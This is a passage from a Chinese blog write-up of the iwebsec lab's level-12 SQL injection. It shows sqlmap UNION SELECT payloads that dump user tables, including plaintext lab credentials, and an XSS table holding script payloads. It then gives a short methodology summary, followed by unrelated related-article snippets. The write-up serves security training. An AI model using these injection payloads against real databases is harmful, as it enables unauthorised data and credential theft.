[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,JSON_ARRAYAGG(CONCAT_WS(0x706a7a7a6671,id,password,username)),0x7176767171),NULL FROM iwebsec.`user`-- -
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,IFNULL(CAST(id AS CHAR),0x20),0x706a7a7a6671,IFNULL(CAST(password AS CHAR),0x20),0x706a7a7a6671,IFNULL(CAST(username AS CHAR),0x20),0x7176767171),NULL FROM iwebsec.`user`-- -
[09:13:06] [DEBUG] performed 2 queries in 0.02 seconds
[09:13:06] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | pass1    | user1    |
| 2  | pass2    | user2    |
| 3  | pass3    | user3    |
+----+----------+----------+

[09:13:06] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[09:13:06] [INFO] fetching columns for table 'users' in database 'iwebsec'
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,JSON_ARRAYAGG(CONCAT_WS(0x706a7a7a6671,column_name,column_type)),0x7176767171),NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name LIKE 0x7573657273 AND table_schema LIKE 0x69776562736563-- -
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,IFNULL(CAST(column_name AS CHAR),0x20),0x706a7a7a6671,IFNULL(CAST(column_type AS CHAR),0x20),0x7176767171),NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name LIKE 0x7573657273 AND table_schema LIKE 0x69776562736563-- -
[09:13:06] [DEBUG] performed 2 queries in 0.02 seconds
[09:13:06] [INFO] fetching entries for table 'users' in database 'iwebsec'
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,JSON_ARRAYAGG(CONCAT_WS(0x706a7a7a6671,password,role,username)),0x7176767171),NULL FROM iwebsec.users-- -
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,IFNULL(CAST(password AS CHAR),0x20),0x706a7a7a6671,IFNULL(CAST(role AS CHAR),0x20),0x706a7a7a6671,IFNULL(CAST(username AS CHAR),0x20),0x7176767171),NULL FROM iwebsec.users-- -
[09:13:06] [DEBUG] performed 2 queries in 0.02 seconds
[09:13:06] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role  | password    | username |
+-------+-------------+----------+
| admin | mall123mall | orange   |
+-------+-------------+----------+

[09:13:06] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[09:13:06] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,JSON_ARRAYAGG(CONCAT_WS(0x706a7a7a6671,column_name,column_type)),0x7176767171),NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name LIKE 0x787373 AND table_schema LIKE 0x69776562736563-- -
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,IFNULL(CAST(column_name AS CHAR),0x20),0x706a7a7a6671,IFNULL(CAST(column_type AS CHAR),0x20),0x7176767171),NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name LIKE 0x787373 AND table_schema LIKE 0x69776562736563-- -
[09:13:06] [DEBUG] performed 2 queries in 0.02 seconds
[09:13:06] [INFO] fetching entries for table 'xss' in database 'iwebsec'
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,JSON_ARRAYAGG(CONCAT_WS(0x706a7a7a6671,id,name)),0x7176767171),NULL FROM iwebsec.xss-- -
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,IFNULL(CAST(id AS CHAR),0x20),0x706a7a7a6671,IFNULL(CAST(name AS CHAR),0x20),0x7176767171),NULL FROM iwebsec.xss-- -
[09:13:06] [DEBUG] performed 2 queries in 0.02 seconds
[09:13:06] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name                               |
+----+------------------------------------+
| 7  | <img src=1 onerror=alert(/ctfs/)/> |
| 6  | <img src=1 onerror=alert(/ctfs/)/> |
| 5  | <img src=1 onerror=alert(/ctfs/)/> |
| 1  | iwebsec                            |
| 8  | <?php phpinfo();?>                 |
+----+------------------------------------+

[09:13:06] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[09:13:06] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[09:13:06] [WARNING] your sqlmap version is outdated

[*] ending @ 09:13:06 /2022-11-25/


总结

SQL注入主要分析几个内容

(1)闭合方式是什么?iwebsec的第12关关卡为数字型,无闭合

(2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功

(3)是否过滤了关键字?很明显通过源码,iwebsec的第12关卡过滤了等号关键字

了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的等号过滤绕过的SQL注入渗透内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/54708.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Ajax学习:同源策略(与跨域相关)ajax默认遵循同源策略

同源策略&#xff1a;是浏览器的一种安全策略 同源意味着&#xff1a;协议、域名、端口号必须相同 违背同源便是跨域 当前网页的url和ajax请求的目标资源的url必须协议、域名、端口号必须相同 比如&#xff1a;当前网页&#xff1a;协议http 域名 a.com 端口号8000 目标请求…

python——spark入门

Hadoop是对大数据集进行分布式计算的标准工具&#xff0c;这也是为什么当你穿过机场时能看到”大数据(Big Data)”广告的原因。它已经成为大数据的操作系统&#xff0c;提供了包括工具和技巧在内的丰富生态系统&#xff0c;允许使用相对便宜的商业硬件集群进行超级计算机级别的…

Android Poco初始化时,不大起眼但可能存在坑点的参数们

1. 前言 进行Android poco初始化的时候&#xff0c;可能大多数同学都是直接在Poco辅助窗里选择Android模式&#xff0c;然后选择自动帮我们补充poco的初始化脚本&#xff1a; 这种情况下&#xff0c;我们大多数都不会关注初始化的参数。但如果我们不了解这些参数的含义&#x…

Spring之@RequestMapping、@GetMapping、 @PostMapping 三者的区别

我的理解&#xff1a;其实RequestMapping、GetMapping、 PostMapping 三者就是父类和子类的区别&#xff0c;RequestMapping是父类&#xff0c;GetMapping、 PostMapping为子类集成了RequestMapping更明确了http请求的类型 分析三者的源码&#xff1a; RequestMapping .class&…

C#教务管理大数据平台系统源码

校务管理系统是专门针对幼儿园、培训学校的业务应用而设计研发的一款行业应用软件。校管家校务管理系统融入先进的协同管理理念&#xff0c;运用领先的信息化、网络化处理技术&#xff0c;结合丰富的教育培训行业经验&#xff0c;切实有效的解决幼儿园、培训学校日常工作中的关…

[附源码]计算机毕业设计-菜篮子系统Springboot程序

项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM mybatis Maven Vue 等等组成&#xff0c;B/S模式 M…

KVM虚机添加磁盘

KVM虚拟机添加磁盘两种方法&#xff1a; 1、添加虚拟磁盘文件 2、添加物理磁盘 需求 1、/kvm/kvms目录是我们KVM磁盘镜像集中管理的位置&#xff0c;我们需要在/kvm/kvms下给ceph1虚拟机创建名为ceph1-vdb.qcow2的磁盘文件&#xff0c;大小为80G&#xff0c;作为ceph1的vdb磁盘…

Python和labview先学哪个

前言 在这之前&#xff0c;先跟大家分享个身边的故事。 大学同学小宏&#xff0c;在北京一家电子设备公司做运维&#xff0c;上周四刚被升为运维部经理&#xff0c;薪资涨了35%。 但你一定想不到&#xff0c;他平时从不加班&#xff0c;甚至还经常迟到。 &#xff08;文末送…

Qt入门总结

文章目录Qt一、各文件基本概念1、main.cpp文件2、XXX.pro文件3、XXX.h文件二、基本知识1、命名规范2、快捷键三、入门操作1、添加按钮2、重置窗口大小3、设置窗口标题4、设置固定的窗口大小5、对象树6、添加源文件/头文件7、窗口坐标系四、信号与槽1、让按钮附带功能2、自定义信…

浅谈affine_trans_point_2d与affine_trans_pixel

先看下两个坐标图谱&#xff1a; 变换前&#xff1a; 变换后&#xff1a; 我们根据1号点和9号点前后的关系&#xff0c;计算变换后其他点的坐标&#xff1a;这其实就是根据MARK点进行定位的原理 halcon代码&#xff1a; 执行结果&#xff1a; 我们发现&#xff0c;两种变换方…

湘江新区:金融活水赋能实体经济

湘江早报全媒体记者 黄荣佳 通讯员 易芳 吴硕 4月26日&#xff0c;艾布鲁环保在创业板首发上市&#xff1b; 10月28日&#xff0c;“国产操作系统第一股&#xff02;麒麟信安敲响上市钟声&#xff0c;成为今年全省第一家在科创板上市的公司&#xff1b; 11月24日&#xff0c;…

临床信息去冗余 临床数据处理分组不同的GSE数据集有不同的临床信息,不同的分组技巧

最近&#xff0c;我发现学徒在学习GEO数据挖掘的过程中&#xff0c;遇到了第一个也是至关重要的一个难题就是对下载后的数据集进行合适的分组&#xff0c;因为只有对样本进行合适的分组&#xff0c;才有可能得到我们想要的信息。但是不同的GSE数据集有不同的临床信息&#xff0…

SpringCloud全系列知识(4)——统一网关Gateway

统一网关Gateway 一 认识网关 1.网关的功能 1.身份认证和权限校验 2.服务路由&#xff0c;负载均衡 3.请求限流 2.技术实现 Gatewayzuul 二 Gateway的使用 1.搭建网关服务 1.创建新的Module,引入 Gateway 和 Nacos 服务发现依赖。 <!--nacos服务发现依赖-->…

天宇优配|研判明年下半年投资机会或更大 险资看好“安全”与“发展”

上海证券报记者昨日获悉&#xff0c;多家稳妥资管公司已经拟定2023年出资战略&#xff0c;跟着本年以来多项稳经济方针逐步落地&#xff0c;险资遍及看好下一年经济复苏带来的商场出资时机。 权益出资方面&#xff0c;险资以为&#xff0c;当时股票商场估值处于前史较低水平&am…

Java语言有多少优势(总结版)

现在有越来越多的新技术工具、新语言涌现&#xff0c;面对林林总总的语言&#xff0c;总会有人问&#xff1a; 这么多语言应该先学哪一种&#xff1f; 什么语言值得我们长时间地学习&#xff1f; 学完之后职业发展前景大吗&#xff1f; 那么&#xff0c;我给出的答案是Java …

C++手敲Roberts_Prewitt_Sobel实现阈值分割

使用OPENCV,编写代码&#xff0c;学习图像二值化算法&#xff0c;以及边缘检测算法&#xff0c;进行图像的分割。 下面主要介绍Robert算子的实现过程&#xff1a; ①任务分析 调入并显示图像&#xff1b;使用Roberts 算子对图像进行边缘检测处理&#xff1b; Roberts 算子为…

【Scala专栏】字符串与集合

本文索引一、String/StringBuilder二、Array三、List四、Set五、Map六、TupleScala中的字符串在本质上就是Java的字符串String&#xff0c; 所以在用法上除了要符合Scala的语法以外&#xff0c;其他方面是如出一辙的。   Scala中的集合分为可变和不可变&#xff0c;默认声明…

内核编译 --- 链接器

先回顾一下编译知识 将一个程序的编译分为两个大的阶段&#xff1a;编译阶段和链接阶段 编译阶段又分为三个步骤&#xff1a;预编译&#xff0c;编译&#xff08;此编译和上面程序的编译不是同一个意思… 上面那个是指宽泛的编译&#xff09;和汇编 编译阶段经过预编译、编译…

笔记 vue3如何引入iconfont

本次采用的免费字体图标是iconfont 1、点我进入官网 2、具体流程 1、 需要什么图标在上面搜索框查找&#xff0c;然后加入购物车&#xff0c;选完后再点右上角的购物车 2、添加到项目中&#xff0c;有项目就选项目添加&#xff0c;没有就创建项目 3、确定后进入你的项目(可以…

契约测试理论篇

契约测试理论篇 目录契约测试理论篇什么是契约测试契约测试存在一些的问题契约测试的主要实践总结随着 Web 系统的大规模发展&#xff0c;Web API 已经成为了一种广泛使用的技术&#xff0c;再加上微服务和云系统的普及&#xff0c;Web API 的数量呈几何增长。比如在一个大型 W…